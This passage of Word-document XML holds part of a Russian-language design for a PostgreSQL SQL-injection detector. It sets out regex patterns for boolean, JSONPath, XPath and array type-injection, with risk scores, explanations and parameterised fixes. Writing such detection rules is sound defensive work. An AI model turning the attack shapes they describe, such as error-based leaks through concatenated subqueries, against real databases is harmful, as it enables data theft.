        </w:rPr>
        <w:t xml:space="preserve">    # подозрительные XPath patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bxpath(?:_exists)?\s*\(\s*['\"][^'\"]*?(?://|/text\(\)|/name\(\)|starts-with|contains)",</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"type_inj_array": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.11.4 — string_to_array с concat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bstring_to_array\s*\(\s*['\"][^'\"]*['\"]?\s*\|\||"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ANY с ARRAY-constructor + concat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bANY\s*\(\s*ARRAY\s*\[[^\]]*\$\{|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # containment с array-literal от user-input</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"['\"]\{[^}]*\}['\"]\s*::(?:int|text|bigint|uuid)\[\]\s*(?:@&gt;|&lt;@|&amp;&amp;)",</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if _RE["type_inj_boolean_concat"].search(sql):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vulnerability_class=VulnerabilityClass.TYPE_INJECTION,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=8,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Конкатенация user-input в bool-сравнение (WHERE bool_col "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "= '...' || (SELECT ...)) — паттерн error-based leak через "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "invalid boolean syntax. См. 3.11.1.",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Параметризуйте сравнение: WHERE bool_col = $1 с bind "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "value. Не конкатенируйте subquery в bool-context.",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_RE["type_inj_jsonb_path"].search(sql):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vulnerability_class=VulnerabilityClass.TYPE_INJECTION,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=8,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="JSON-path или JSONPath operator с runtime-конкатенацией "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "или подозрительными DSL-конструкциями (like_regex, .**, "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "?(...)) — паттерн arbitrary key extraction или JSONPath "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "injection. См. 3.11.2.",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="JSON-path должен быть фиксированным template или bind "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "variable. Whitelist разрешённых path-литералов на "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "application-уровне.",</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_RE["type_inj_xpath"].search(sql):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vulnerability_class=VulnerabilityClass.TYPE_INJECTION,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=8,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="xpath() / xpath_exists() / xmltable с runtime-"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "вычисленным XPath или с recursive-spuskom (//, /text(), "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "starts-with, contains в payload-выражении) — паттерн "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "XPath injection. См. 3.11.3.",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="XPath должен быть фиксированным template, переданным "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "как bind variable. Whitelist разрешённых XPath-выражений.",</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_RE["type_inj_array"].search(sql):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vulnerability_class=VulnerabilityClass.TYPE_INJECTION,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=7,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="string_to_array с concat, ANY(ARRAY[]) с user-input в "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "элементах, или containment-оператор (@&gt;/&lt;@/&amp;&amp;) с "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "user-controlled array literal — паттерн array injection. "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "См. 3.11.4.",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Передавайте array через typed bind value драйвера "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "(psycopg/asyncpg list→ARRAY автоматический). Не "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "конкатенируйте array literal вручную.",</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Градация risk обоснована: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type_inj_boolean_concat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Concat в bool-context + subquery — почти всегда leak attempt; легитимные сценарии редки.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type_inj_jsonb_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. JSONPath DSL-операторы (like_regex, **) в runtime-генерируемом SQL — почти всегда атака; легитимно эти конструкции в фиксированных queries.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type_inj_xpath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. XPath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recursive descent или XPath-функциями — recon/leak-сигнатура; легитимные XPath обычно конкретные paths.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type_inj_array</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Чуть ниже risk, потому что some legitimate use cases of array-concat существуют (например, dynamic IN-list через unsafe-но-legitimate-в-аналитике конкатенацию); индикатор требует более тщательного контекстного анализа.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">risk сопоставим с FILTER_BYPASS (6-8) — обе категории про "паттерн-маркер атаки", не "точно атака"; LLM-судья принимает финальное решение по совокупности.</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Docs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Boolean Type, JSON Functions and Operators (включая jsonpath), XML Functions, Arrays — все subsection в одной документации, основа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W3C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: XPath 1.0 Specification — grammar.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SQL standard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: SQL:2016 SQL/JSON path expressions — основа PG 12+ JSONPath.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CVE-2017-7484, CVE-2021-43795</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: исторический контекст для XML-ограничений в PG.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Общие</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: PortSwigger Web Security Academy (XPath injection, NoSQL injection как аналог JSONPath), HackTricks PostgreSQL Injection (type coercion bypass, JSON operators), OWASP (XPath Injection), driver-документация (psycopg3, asyncpg, pgjdbc, node-postgres, pgx).</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downstream leak channel для всех 3.11 точек входа.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w:t>
      </w:r>
      <w:r>
